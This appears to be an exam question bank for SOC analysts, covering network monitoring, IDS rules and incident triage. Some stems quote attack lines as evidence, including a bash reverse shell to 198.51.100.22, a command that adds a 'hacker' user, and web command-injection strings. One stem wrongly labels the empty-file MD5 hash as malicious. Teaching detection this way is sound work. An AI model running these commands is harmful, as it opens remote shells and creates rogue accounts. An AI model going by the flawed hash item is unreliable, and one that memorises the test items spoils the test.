During a security incident, a SOC analyst reviews NetFlow records and notices a single internal host communicating with a remote server on TCP port 443, sending 50 MB of data in 5 minutes, while the usual baseline for that host is 1 MB per hour. Which type of activity is most likely indicated?
While analyzing a PCAP file in Wireshark, an analyst sees multiple GET requests to /login.php with different usernames in the URL parameters, all from the same source IP: 192.168.1.100 to 10.0.0.1. The HTTP response codes are mostly 200 OK. This pattern suggests which attack?
During an incident response, an analyst extracts a suspicious file and computes its MD5 hash: d41d8cd98f00b204e9800998ecf8427e. Upon checking a threat intelligence feed, this hash is known as a malicious indicator. What does this hash represent?
A SOC analyst is reviewing a large number of alerts from a SIEM. Which THREE of the following are effective steps to prioritize and investigate alerts in a high-volume environment? (Choose three.)
During packet analysis, an analyst notices a TCP connection with a large number of SYN packets sent to various ports on a single host but no completed handshakes. This is characteristic of which activity?
In Snort, a rule is written as: alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"SMB exploit attempt"; flow:to_server; content:"|ff|SMB"; nocase;). What does the 'flow:to_server' option indicate?
A security analyst is reviewing web server logs and notices a high number of 404 errors for non-existent URLs. Which TWO of the following tools would best help investigate this anomaly?
An analyst detects an internal host communicating with an external IP known for malware distribution. Which THREE of the following are valid Indicators of Compromise (IoCs) that should be recorded?
A SOC analyst is investigating a web server log and sees the following entry: 192.168.1.10 - - [15/May/2023:10:15:30 +0000] 'POST /login.php HTTP/1.1' 200 1245 'http://example.com/login.php' 'Mozilla/5.0'. Which observation is most suspicious?
A security analyst is using Wireshark to capture traffic from a network segment. They want to see only packets that contain the string 'password' in the payload. Which type of filter should they apply?
During a security investigation, an analyst examines a PCAP file in Wireshark. The analyst wants to see only traffic between two specific IP addresses (192.168.1.10 and 10.0.0.5). Which display filter should be applied?
A security analyst is using Zeek to monitor network traffic. The analyst wants to extract all files transferred over HTTP. Which Zeek script or package accomplishes this?
A SOC analyst observes a spike in DNS queries for long, random-looking subdomains under a single domain from an internal host. The responses are NXDOMAIN. Which type of activity is most likely indicated?
A SOC analyst is investigating a potential data exfiltration incident. Which TWO Indicators of Compromise (IoCs) would be most relevant for tracking the exfiltration of files over the network?
A security analyst is tuning a Snort IDS to reduce false positives. Which TWO Snort rule options should the analyst modify to make the rule more specific?
A security analyst is reviewing network traffic and notices a high volume of small packets from an internal IP to a single external IP on port 53. Which type of activity is most likely indicated?
A SOC analyst is reviewing firewall logs and sees repeated entries: 'Deny TCP 10.0.0.5:49152 -> 203.0.113.1:22' and 'Deny TCP 10.0.0.5:49153 -> 203.0.113.1:22'. What does this pattern suggest?
An analyst notices a Zeek (Bro) connection log showing a single HTTP request from internal IP 192.168.1.10 to external IP 203.0.113.5 with a URI of '/files/secret.docx' and a response code of 200. The file size is unusually large (50 MB). What should the analyst suspect?
A security analyst is investigating a potential brute-force attack on an SSH server. Which TWO of the following log sources would provide the most relevant evidence for detecting and confirming this attack? (Choose two.)
During a security monitoring exercise, an analyst observes a series of NetFlow records showing a single internal host communicating with multiple external IP addresses on port 445 (SMB) within a short time window. The traffic volumes are small but consistent. Which THREE of the following should the analyst consider as possible explanations? (Choose three.)
A SOC analyst is reviewing a Firepower Management Center (FMC) event dashboard and sees many events with the message 'File blocked' from the file policy. The analyst wants to identify the SHA-256 hash of the blocked file for threat hunting. Which FMC feature should the analyst use?
An analyst is reviewing a PCAP and observes a series of TCP packets where the client sends a SYN, receives a SYN-ACK, sends an ACK, and then immediately sends a RST. This pattern repeats multiple times to different destination ports on the same server. Which conclusion is most accurate?
A SOC analyst is reviewing a Cisco Firepower Management Center (FMC) intrusion event that shows an exploit attempt against a web server. The analyst wants to understand the vulnerability being targeted and whether a patch is available. Which field in the FMC event details provides this information?
An analyst is examining a PCAP in Wireshark and sees a TCP stream where the client sends a single packet with the PSH, ACK flags set and a payload containing a long base64 string, followed immediately by the server responding with an RST. Repeated streams show the same pattern to the same destination IP on port 443. Which conclusion is most defensible?
A security analyst is examining a packet capture of suspicious network traffic. The analyst observes the following: multiple TCP connections to various ports on a single external IP address from different source ports on the internal network, each connection lasting less than one second, and no data transfer after the TCP handshake. Which TWO of the following activities does this pattern MOST likely indicate? (Choose two.)
A SOC analyst is reviewing Cisco Firepower syslog events and notices a large number of connections from a single internal host to many different external IP addresses on port 443, with very small data transfers. Which type of malicious activity does this pattern most likely represent?
A security analyst is examining a suspicious file and wants to determine if it is malicious. The analyst runs the file in a sandbox and observes that it creates a new service, modifies the registry to enable automatic startup, and attempts to connect to an external IP address on port 443. Which type of malware behavior is most consistent with these observations?
A SOC analyst is reviewing DNS logs from the past 24 hours and notices a single internal host, 10.10.20.45, has made thousands of DNS queries for randomly generated subdomains such as a8f3k2.example.com, 9dj2m4.example.com, and q7x1z9.example.com. Each subdomain resolves to the same external IP address and the queries occur at a steady rate of one every few seconds. Which type of malicious activity is most likely indicated by this pattern?
A security analyst is examining a packet capture in Wireshark and notices several TCP streams that contain HTTP requests with unusually long User-Agent strings, base64-encoded data in cookies, and periodic connections to a domain that resolves to a dynamic DNS provider. Which TWO findings are most indicative of command-and-control (C2) communication? (Choose two.)
A security analyst is examining a suspicious executable found on a user's workstation. The file has a valid digital signature from a trusted vendor, but the analyst suspects it may be malicious. Which TWO characteristics would most strongly indicate that the file is likely malicious despite the valid signature? (Choose two.)
A security analyst is investigating a potential insider threat. The analyst has access to various logs and wants to identify evidence of data exfiltration. Which TWO log sources would be most useful to correlate for detecting large-scale data transfers to an external destination? (Choose two.)
A junior analyst is reviewing Cisco Umbrella logs and sees a request from an internal host to 'malware-c2.example.com'. The domain is categorized as 'Malicious' by Umbrella. The analyst wants to quickly determine if other hosts on the network have attempted to resolve this domain. Which action should the analyst take?
A SOC analyst observes a sudden spike in DNS queries from a single internal host to random-looking subdomains under the same parent domain, each resolving to a different IP address. Which technique is most likely being used?
A security analyst is reviewing a packet capture in Wireshark and notices a series of TCP packets with the RST flag set, originating from various source IPs and targeting a single internal server on port 80. The server is not responding to any of these packets. What is the most likely explanation for this traffic pattern?
A SOC analyst is examining a security alert from Cisco AMP for Endpoints. The alert indicates that a file named 'invoice.pdf.exe' was executed on a user's workstation. The file was downloaded from an email attachment. The analyst observes that the file created a scheduled task named 'Updater' and established a connection to an external IP on port 443. Which of the following best describes the next step in the incident response process?
A junior analyst is asked to configure a Cisco Firepower access control policy to log all connections from the guest wireless VLAN to external destinations while still allowing them. Which action setting accomplishes this with the least disruption to guest users?
A SOC analyst is reviewing Cisco Firepower intrusion events and sees an alert for a TCP session where the client sent a single packet with the PSH, ACK, and FIN flags set, followed by no further packets. The destination port is 443, and the payload contains a valid TLS ClientHello. Which explanation best describes this traffic?
A SOC analyst is investigating a potential security incident and needs to determine if a host is beaconing to a command-and-control server. Which two data sources would provide the most direct evidence of beaconing behavior? (Choose two.)
An analyst is monitoring network traffic and observes a large number of TCP SYN packets sent to a single host on various ports with no corresponding SYN-ACK replies. This behavior is most indicative of which type of attack?
A security engineer is setting up a Snort rule to detect FTP traffic where the source IP is not from the internal network. Which Snort rule header correctly specifies the action, protocol, source, and destination?
An analyst is examining a firewall log entry: '2023-10-25 14:30:00 ACTION=DENY SRC=10.0.0.5 DST=203.0.113.50 PROTO=TCP SPT=445 DPT=445'. Which statement best describes this event?
A SOC analyst needs to create a SIEM correlation rule to detect a brute force attack against SSH on a server. Which of the following would be the most effective rule logic?
A security analyst is reviewing Zeek connection logs and sees the following entry: '192.168.1.10:12345 > 10.0.0.1:80 (tcp) duration 0.001 sec, service http, bytes 60, state S0'. Based on the state 'S0', what does this indicate about the connection?
An analyst receives an IDS alert with signature name 'ET TROJAN Win32.Zeus Checkin' and severity 'high'. The alert shows source IP 192.168.1.50 and destination IP 198.51.100.20 on port 443. Which action should the analyst take FIRST?
An analyst is reviewing a web server log and sees the following entry: '192.168.1.1 - - [25/Oct/2023:10:15:30 -0400] "GET /admin/index.php?cmd=id HTTP/1.1" 200 1532 "-" "Mozilla/5.0"'. What potential attack does this log entry suggest?
A SOC analyst is tuning IDS signatures and notices that a particular signature triggers frequently on legitimate traffic from a specific internal application. The signature has a high false positive rate. What is the best action to take?
A security analyst is investigating a potential data exfiltration incident. Which TWO of the following are common indicators that data exfiltration may be occurring over DNS? (Choose two.)
During a security monitoring review, an analyst notices an unusual amount of traffic on port 445. Which protocol is most likely associated with this port?
An analyst uses Wireshark to examine network traffic and wants to see only packets that contain the string 'password'. Which type of filter should be applied?
In a Zeek/Bro log, an analyst observes a connection with 'service' field set to 'dns' and 'query' field containing a long, random-looking subdomain. This could be indicative of which type of activity?
A security analyst is reviewing firewall logs and notices a rule that denies traffic from source IP 10.0.0.5 to destination port 3389. What service is being blocked?
A SOC analyst is analyzing NetFlow data and notices a sudden spike in outbound traffic from a single internal host to an external IP address during non-business hours. The traffic volume is significantly higher than the baseline. Which suspicion is most likely?
An IDS/IPS alert shows a signature named 'ET POLICY Outgoing HTTP Request with Suspicious User-Agent' with severity high. What is the most likely next step for an analyst?
During an incident response, an analyst extracts a file from network traffic using Zeek's file analysis feature. The file has a SHA-256 hash that matches a known malware indicator. Which type of IoC is this?
A security analyst is monitoring network traffic and notices a high volume of TCP SYN packets sent to various ports on a single host. Which type of attack is most likely occurring?
A SIEM correlation rule triggers an alert when more than 10 failed login attempts from the same source IP occur within 60 seconds. Which attack is this rule designed to detect?
An analyst captures traffic and sees a high number of DNS queries for random subdomains under a single domain, all returning NXDOMAIN. This pattern is typical of which malicious activity?
A Zeek connection log shows a high number of connections from a single internal IP to many different external IPs on port 25, with small payload sizes. Which behavior is most likely indicated?
A NetFlow report shows that host 10.0.0.5 has sent 1 GB of data to external IP 198.51.100.10 over port 443 in the last hour, while other hosts average 100 MB. This anomaly is most indicative of:
A security analyst is tuning a SIEM to detect lateral movement. Which THREE log sources would provide the most useful data for this purpose? (Choose THREE.)
A security analyst observes a NetFlow record showing a single internal IP communicating with many external IPs on port 445 within seconds. This pattern is indicative of:
A SIEM correlation rule triggers when more than 10 failed login attempts from a single source IP occur within 1 minute. This rule is designed to detect:
An analyst finds a YARA rule that matches a file containing the string 'MZ' at offset 0 and includes 'CreateRemoteThread'. This rule likely identifies:
A security analyst is monitoring network traffic and notices a large number of TCP SYN packets being sent to a single host on various ports. Which type of attack is most likely occurring?
A network analyst notices that a host is sending a large volume of traffic to an external IP address on port 443 during non-business hours. The traffic volume is significantly higher than the established baseline. Which type of data exfiltration technique should be suspected?
A security analyst is reviewing Snort IDS alerts and sees the following rule triggered: alert tcp $HOME_NET any -> $EXTERNAL_NET 80 (msg:'Possible SQL Injection'; content:'UNION'; nocase; sid:1000001;). Which action will Snort take when it detects matching traffic?
A SIEM correlation rule is configured to alert when there are 10 failed login attempts from the same source IP within 1 minute. An analyst receives an alert for source IP 10.0.0.5. Which type of attack is most likely being detected?
An organization uses Zeek for network monitoring. An analyst wants to extract files transferred over HTTP from network traffic. Which Zeek script or functionality should they use?
A network administrator is creating a baseline for normal traffic patterns. Which of the following should be considered typical for a web server during business hours?
A SOC analyst is reviewing a NetFlow record and sees that a single internal IP has communicated with multiple external IPs on port 445 (SMB) within a short time frame. Which type of activity is most likely indicated?
A security analyst is investigating a potential data exfiltration incident. Which TWO of the following network behaviors are indicators of data exfiltration?
A SOC analyst is analyzing logs from multiple sources. Which THREE log types are most useful for detecting a brute force attack against a web application?
An analyst is monitoring network traffic and sees a large number of TCP SYN packets sent to various ports on a single host from the same source IP. Which type of attack is most likely occurring?
A security analyst is reviewing firewall logs and notices a high number of denied outbound connections from an internal workstation to various external IP addresses on port 445 (SMB). What is the most likely explanation for this activity?
A NetFlow analysis shows that a single internal IP sent 10 GB of data to an external IP within one hour, whereas the baseline for that host is typically 100 MB per day. Which type of activity does this indicate?
An analyst is configuring a Snort rule to detect a known exploit targeting Apache web servers. The exploit sends a malicious HTTP POST request with a long User-Agent string. Which Snort rule header and options are most appropriate?
A SIEM correlation rule is designed to detect a brute-force attack. The rule triggers when an event includes 10 or more failed logins from the same source IP within 1 minute. An analyst sees an alert for 12 failed logins from IP 10.0.0.1 in 2 minutes. Why did the rule not trigger?
An analyst is investigating a potential data exfiltration via DNS. In Zeek DNS logs, the analyst sees many queries for subdomains like 'a1b2c3.malicious.com', 'd4e5f6.malicious.com' etc. from an internal host. Which technique is likely being used?
An analyst is reviewing IDS alerts and sees an alert with signature name 'ET POLICY Suspicious inbound to MySQL port 3306'. The source IP is external and destination is an internal database server. What is the best immediate action?
A SOC analyst is tuning a SIEM correlation rule to detect port scanning. The rule should generate an alert when a single source IP connects to many different destination ports on multiple hosts within a short time. Which THREE conditions should be included in the rule?
A security analyst is reviewing a Wireshark capture and notices a large number of TCP SYN packets sent to multiple ports on a single host from the same source IP. Which type of network activity is most likely being observed?
A security analyst is using NetFlow data to investigate a potential data exfiltration incident. Which NetFlow metric is most useful for identifying large volumes of data being transferred to an external IP address?
During a security assessment, a SOC analyst notices an IDS/IPS alert with a severity of 'High' for a signature named 'ET TROJAN Win32.Vobfus Checkin'. The alert shows source IP 10.0.0.5 and destination IP 203.0.113.50 on port 443. What is the most likely interpretation of this alert?
A security analyst is investigating an alert from a Windows system log that shows multiple failed logon attempts for the same user account within a short period, followed by a successful logon. Which type of attack does this pattern suggest?
A security analyst is examining web server logs and finds an entry with method 'POST', URL '/login.php', response code '200', and user-agent 'Mozilla/5.0'. The log shows 100 similar entries from the same IP within 5 seconds. What is the most likely activity?
A network baseline shows that a server typically sends 1-2 MB of data per hour to external IPs. Suddenly, the server sends 50 MB of data to an IP in a foreign country within 10 minutes. The traffic is encrypted. Which monitoring tool would best confirm data exfiltration?
A security analyst is using a SIEM to create a correlation rule that triggers when more than 10 failed logins are detected from the same source IP within 1 minute. This rule is designed to detect which type of attack?
A SOC analyst reviews a firewall log with the following entry: action=deny, source IP=192.168.1.100, destination IP=10.0.0.1, destination port=22. The analyst knows that 10.0.0.1 is an SSH server. What does this log entry indicate?
A security analyst is using Zeek to analyze network traffic. Which Zeek log would be most useful for identifying HTTP requests to a known malicious domain?
An analyst suspects a host is communicating with a command-and-control server using DNS tunneling. Which THREE network traffic patterns would support this hypothesis?
A SIEM correlation rule triggers when it detects more than 10 failed login attempts from the same source IP within 1 minute. Which type of attack is this rule designed to detect?
A SOC analyst is investigating a potential data exfiltration incident. Which TWO indicators from NetFlow/IPFIX analysis would most strongly suggest data exfiltration?
An analyst is reviewing web server logs and sees the following entries: 'GET /admin/login.php HTTP/1.1' returning 404, followed by 'GET /admin/login.html' returning 404, then 'GET /admin/login.asp' returning 200. Which TWO observations are most relevant?
A security analyst is analyzing system logs and notices multiple failed authentication events followed by a successful login from the same user account, and then a privilege escalation event. Which THREE events should be correlated to detect a potential attack?
An analyst is using Zeek to monitor network traffic. Which THREE types of logs can Zeek generate to provide visibility into application-layer activity?
A SOC analyst notices that a workstation is generating NetFlow records showing repeated outbound connections to 203.0.113.45 on port 443 at regular 60-second intervals, with each flow transferring approximately 4 KB. The destination IP has no reputation data. Which analysis approach would best determine whether this traffic represents C2 beaconing?
A SOC analyst is reviewing Cisco Firepower intrusion event logs and notices a signature that fired with the message 'OS-COMMAND' on traffic destined to an internal web server on TCP port 80. Which type of activity does this signature most likely indicate?
A network security analyst is examining a packet capture in Wireshark and notices a series of TCP packets with the PSH, ACK flags set, and a payload containing the string 'cmd.exe /c whoami'. The packets are destined to port 445 on an internal server. Which type of malicious activity is most likely indicated?
A SOC analyst is reviewing Cisco Firepower Intrusion Event logs and notices a high volume of alerts for the signature 'SERVER-WEBAPP Apache Struts2 remote code execution attempt' coming from a single internal host to external web servers. The analyst needs to determine if this is a true positive or a false positive. Which of the following actions would BEST help make that determination?
A security analyst is investigating a potential security incident and needs to correlate events across multiple data sources. Which two Cisco CyberOps tools or features would provide network flow data and intrusion event details respectively? (Choose two.)
A security analyst is examining a suspicious executable found on a compromised host. The analyst runs the command 'strings malware.exe' and sees the string 'cmd.exe /c net user hacker P@ssw0rd /add'. What is the most likely intent of this command?
A security analyst is examining a suspicious executable and wants to extract readable strings to identify potential C2 domains or file paths. The analyst has the file on a Windows workstation and needs to use a built-in or commonly available tool. Which approach is most appropriate?
An analyst is investigating a potential security incident and reviews the Cisco ASA firewall logs. The logs show the following entry: 'Deny tcp src outside:203.0.113.5/443 dst inside:10.1.1.10/3389'. Which of the following does this log entry indicate?
A Cisco Firepower analyst inspects an inline intrusion policy event where the packet was dropped but only a partial payload was captured. The analyst wants to confirm whether the attack was successful on the target host. Which data source should be correlated with the Firepower event?
A security analyst is examining a suspicious file and wants to determine its reputation and threat score. Which Cisco security solution should the analyst use to query the file's SHA-256 hash and get a verdict?
A SOC analyst is reviewing Cisco Firepower and NetFlow records for a suspected lateral movement campaign inside the corporate network. Which TWO monitoring observations most strongly support the hypothesis that an attacker is moving laterally using SMB? (Choose two.)
A SOC analyst is reviewing DNS logs and suspects that a host is communicating with a domain generation algorithm (DGA) used by malware. Which TWO characteristics in the DNS logs would most strongly support this suspicion? (Choose two.)
A SOC analyst is investigating a potential security incident involving a Windows workstation. The analyst has collected network traffic and host logs. Which two artifacts would provide the most direct evidence of a Pass-the-Hash attack? (Choose two.)
A security analyst is examining a suspicious file and calculates its SHA-256 hash. The analyst then queries Cisco Talos Intelligence for the hash. The result shows that the file is known malware with a detection name of 'Trojan.GenericKD.123456'. Which of the following does this result indicate?
A threat hunter reviews Cisco Umbrella DNS logs and notices repeated queries for randomly generated subdomains under a single parent domain, each resolved by a different authoritative name server. The hunter suspects DNS tunneling. Which additional artifact would most directly confirm command-and-control activity rather than legitimate DNS behavior?
A network engineer is deploying a Cisco Next-Generation IPS (NGIPS) in inline mode. The security team wants to ensure that the device can block malicious traffic while also providing contextual information about the attack. Which of the following Cisco NGIPS features provides detailed information about the attack and the target, including vulnerability mapping?
A security analyst is reviewing firewall logs and notices that a workstation is making outbound connections to multiple external IP addresses on port 22 (SSH). The workstation is not authorized to use SSH for external connections. Which type of activity does this most likely indicate?
A security analyst is reviewing a packet capture in Wireshark and notices a series of DNS queries for randomly generated domain names such as 'a1b2c3d4e5.com', 'f6g7h8i9j0.net', and 'k1l2m3n4o5.org'. The queries are sent to multiple different DNS servers. Which type of malicious activity does this pattern most likely indicate?
A network security analyst is reviewing traffic logs and notices a series of connections from an internal host to a known command-and-control (C2) server. The connections occur every 5 minutes and are small in size. Which of the following is the MOST likely explanation for this traffic pattern?
A SOC analyst is triaging a Cisco Stealthwatch alarm that shows a workstation uploading 4 GB to an external IP address at 02:00, outside normal business hours. The destination has no prior reputation data. Which action should the analyst take first according to the incident response process?
A SOC analyst is reviewing network telemetry from Cisco Stealthwatch and notices a host inside the corporate network initiating repeated outbound connections to a single external IP address. Each connection is short-lived (less than 5 seconds) and occurs at irregular intervals, with varying destination ports. The analyst suspects command-and-control activity. Which approach would best confirm this suspicion using available telemetry?
A SOC analyst monitoring Cisco Stealthwatch Enterprise notices a host inside the network is receiving NetFlow records showing repeated inbound connections on TCP port 3389 from multiple external IP addresses over a short period. The host is a workstation, not a server. Which action should the analyst take first?
An analyst reviews Cisco ASA syslog messages and sees repeated entries with message ID 106023 denied inbound TCP from an external address to an internal web server on port 443. The web server is expected to receive inbound HTTPS traffic. What should the analyst investigate?
A security analyst is examining a PCAP and observes a TCP stream where the client sends a single packet with the PSH, ACK flags set, and the server responds with a single packet with the RST, ACK flags set. The client then sends no further packets. What is the most likely explanation for this behavior?
A Cisco CyberOps analyst is reviewing a network security monitoring console and must determine which TWO data sources are most useful for detecting lateral movement by an attacker who has already compromised a workstation. (Choose two.)
A SOC analyst reviewing Cisco Firepower intrusion events notices that a single internal host generated hundreds of alerts for the same signature within a five-minute window, each with a different destination port on the same external IP. The analyst wants to reduce noise before escalating. Which action should the analyst take first?
An analyst is reviewing Cisco Firepower intrusion events and sees an alert for a TCP connection to an internal web server on port 80 with the rule message 'SERVER-WEBAPP Apache Struts2 remote code execution attempt'. The packet payload contains the string 'Content-Type: %{(#_='multipart/form-data')'. The server is running Apache Struts2 version 2.3.15. What should the analyst do next?
An analyst is reviewing DNS logs and sees repeated queries from an internal workstation to randomly generated subdomains of a single domain, such as a1b2c3.example.com, d4e5f6.example.com, and so on. The responses are consistently NXDOMAIN. Which technique is most consistent with this pattern?
While analyzing a packet capture in Wireshark, an analyst observes a series of TCP packets with the PSH, ACK flags set and a payload containing the string 'cmd.exe /c whoami'. The destination port is 4444. Which type of activity is most likely indicated?
A junior analyst is asked to identify which type of log would best show whether a Windows workstation attempted to authenticate to a file share on another server. Which log source should the analyst consult?
A SOC analyst is investigating a Windows workstation that has been exhibiting unusual outbound connections. Reviewing Sysmon Event ID 3 (Network Connection) logs, the analyst notices a process named svchost.exe with a parent process of cmd.exe initiating connections to an external IP on port 4444. On a healthy system, svchost.exe is normally spawned by services.exe. Which conclusion is most strongly supported by these log entries?
A network analyst is examining a packet capture and notices a series of TCP packets where the client sends a SYN, the server responds with SYN-ACK, and the client never sends an ACK. The client repeats this for many destination ports on the same server. Which conclusion is most accurate?
A network security analyst is reviewing NetFlow records from a perimeter router and observes that an internal server at 172.16.5.20 has transferred approximately 4.5 GB to an external IP address in country X over the past three hours, all during non-business hours. The destination IP has no prior communication history with the organization and the traffic uses port 443. Which analysis approach would best confirm whether this represents data exfiltration?
A SOC analyst is reviewing proxy logs and wants to identify indicators of potential data exfiltration over HTTP. Which two patterns should the analyst treat as suspicious? (Choose two.)
A SOC analyst is reviewing NetFlow records exported from the border router. A single internal workstation is generating a steady stream of outbound sessions to dozens of unique external IP addresses on TCP port 443, each lasting only a few seconds, every day at 02:00. No corresponding firewall denies are logged. Which security monitoring conclusion is most appropriate?
A SOC analyst is correlating multiple data sources after a suspected web application compromise on an internet-facing server. The analyst has access to web server logs, firewall logs, and endpoint detection and response (EDR) telemetry. Which TWO log sources or record types would most directly help identify the initial exploitation attempt and the subsequent post-exploitation activity? (Choose two.)
An analyst is triaging a host that antivirus flagged for a file named svchost.exe running from C:\Users\Public\Downloads. The file has a valid digital signature issued to a legitimate software publisher, and the hash matches a known-good installer component. The process is making outbound SMB connections to several internal servers. Which action best reflects sound security monitoring practice?
A network security analyst is reviewing firewall logs and sees repeated denied inbound connection attempts from various external IP addresses to TCP port 3389 on several internal hosts. Which type of activity does this most likely represent?
A Cisco Firepower analyst notices repeated syslog messages from an ASA firewall showing TCP connections to 203.0.113.55:4444 that are reset immediately after the three-way handshake. The source hosts are internal workstations running an outdated browser plugin. Which security monitoring data source would best confirm whether these workstations established a command-and-control channel?
A junior SOC analyst receives an alert indicating that a workstation attempted to resolve a domain associated with a known malware family. The analyst wants to determine whether the workstation actually connected to the malicious domain or if the resolution attempt was blocked. Which data source would most directly answer this question?
An analyst is investigating a potential data exfiltration incident. The only available data is NetFlow records from Cisco routers. Which NetFlow field would be most useful to identify large outbound transfers to an unusual external host?
A junior analyst is asked to determine which log source would best reveal an attacker attempting to authenticate to a Windows file server with stolen credentials over the network. Which source should the analyst consult first?
A threat hunter reviews Cisco Stealthwatch flow data and sees an internal server sending periodic 300-byte outbound flows to an external IP every 60 seconds, with consistent packet sizes and no matching inbound response beyond TCP acknowledgments. The server's DNS queries for that IP resolve through a newly registered domain. Which monitoring approach best characterizes this activity as beaconing rather than normal application traffic?
A security analyst is reviewing NetFlow records exported from a Cisco router at the internet edge. During a suspected ransomware staging window, a single internal host shows a sustained outbound flow to one external IP on TCP 443 with 4.2 GB transferred over 40 minutes, while the host's normal baseline for that destination is under 5 MB per day. No corresponding proxy log entry exists for this session. Which conclusion is best supported by these records?
A SOC analyst is reviewing NetFlow records exported from a border router and notices a single internal host initiating outbound connections to more than 300 distinct external IP addresses on TCP port 443 within a five-minute window, with each flow carrying only a few hundred bytes. Which security monitoring conclusion is best supported by this evidence?
A SOC analyst is reviewing firewall logs and sees repeated outbound connections from an internal server to an external IP on TCP port 443, but the traffic is not TLS. Packet capture shows a custom binary protocol with periodic small keepalives. Which type of malicious activity is most consistent with these findings?
A SOC receives a threat intelligence feed indicating that a specific SHA-256 hash belongs to a trojan. An analyst searches the endpoint telemetry and finds no process with that hash, but the file name appears in several temporary directories. Which explanation best accounts for this result?
An analyst is tuning a Cisco Firepower intrusion policy. A rule fires repeatedly with the message 'MALWARE-CNC Outbound connection to known malicious domain' against a marketing workstation. Packet capture shows the workstation resolving and connecting to a domain that the threat intelligence feed lists, but the endpoint shows no malicious process, no persistence, and the user states they clicked a link in a phishing email an hour earlier. Which action best reflects sound incident handling at this stage?
A SOC analyst is tuning Cisco Firepower intrusion policies and reviewing alert metadata to prioritize response. Which TWO alert attributes most directly indicate that a detected event represents a successful compromise rather than a blocked attempt? (Choose two.)
An analyst is triaging an alert generated by Cisco Secure Network Analytics (Stealthwatch) showing a host inside the network communicating with a known command-and-control IP. The analyst wants to determine whether the communication has already resulted in data theft. Which additional telemetry source would provide the most direct evidence of successful exfiltration?
An analyst is reviewing a Windows event log and sees Event ID 4625 repeated many times for the same user account from different source workstations within a short period. Which activity does this most likely indicate?
A security analyst is reviewing Sysmon telemetry from a workstation that may be compromised. Which TWO event types should the analyst correlate first to identify suspicious process execution and persistence? (Choose two.)
A SOC analyst receives an alert that a user account successfully authenticated to the VPN from two geographically distant locations within four minutes. Both sessions remain active. The identity team confirms the user is traveling and has only one device. Which monitoring conclusion is most appropriate?
A security analyst is correlating network and endpoint telemetry to detect a host infected with malware that is attempting to establish persistence and communicate externally. Which TWO artifacts would best support this investigation? (Choose two.)
A network security analyst is configuring a SPAN session on a Cisco switch so that a Cisco Firepower sensor can inspect traffic between the internal user VLAN and the internet-facing router. The switch has a single physical uplink carrying that traffic. Which configuration goal must the analyst keep in mind to ensure the sensor receives complete sessions?
An analyst is correlating telemetry after a suspected Kerberoasting attack against an Active Directory environment. Which two artifacts, when found together, most strongly support that the attack succeeded in obtaining crackable service ticket material? (Choose two.)
During incident response, an analyst notices that a compromised host is making outbound SMB connections to several internal servers on TCP port 445 using the same domain user account within minutes. Which activity is most likely occurring?
A SOC analyst is correlating events in the SIEM after an alert fired for suspicious PowerShell execution on a workstation. The analyst wants to identify additional evidence that would support a ransomware pre-encryption hypothesis. Which two telemetry findings would most strongly support that hypothesis? (Choose two.)
An analyst investigates a Linux web server and finds a bash process spawned by the Apache user, with its parent process being httpd. The bash process has an outbound connection to an external IP on port 443, and the server's audit log shows the command 'bash -i >& /dev/tcp/198.51.100.22/443 0>&1'. Which security monitoring technique most reliably detects this specific attack pattern across the environment?
A network security analyst reviews a packet capture from a compromised host and sees repeated outbound DNS queries for long, random-looking subdomains such as 'a3f9c2b81e7d4.example-cdn.net', each followed by a small response and no subsequent connection to the returned address. Which interpretation is most accurate?
During incident response, an analyst is collecting volatile evidence from a compromised Linux server that is still running. The team wants to preserve the current state of active network connections and running processes before any remediation. Which action best preserves this volatile data in a forensically sound manner?
A security analyst is using Cisco Umbrella and notices a high volume of DNS queries from a single internal host to randomly generated domain names that do not resolve. The queries are for domains like 'a1b2c3d4.com', 'e5f6g7h8.net', etc. What type of malicious activity is most likely occurring?
A Cisco Stealthwatch analyst notices a host on the internal network is sending periodic DNS queries to a single external domain with subdomains that are long, random-looking strings (e.g., a8f3k2j9d0x1.example.com). The queries occur every 60 seconds, and the responses are consistently NXDOMAIN. Which type of malicious activity does this pattern most strongly indicate?
A security analyst is examining a Cisco Umbrella Investigate report for a domain that has been flagged as malicious. The report shows a high 'security score' and lists multiple categories including 'Malware' and 'Command and Control'. Which action should the analyst take first?
A network security analyst is reviewing NetFlow records from a Cisco router and notices a large number of flows from a single internal host to many external IP addresses on port 445. The flows are short, with small packet counts, and occur within a few minutes. Which type of activity is most likely occurring?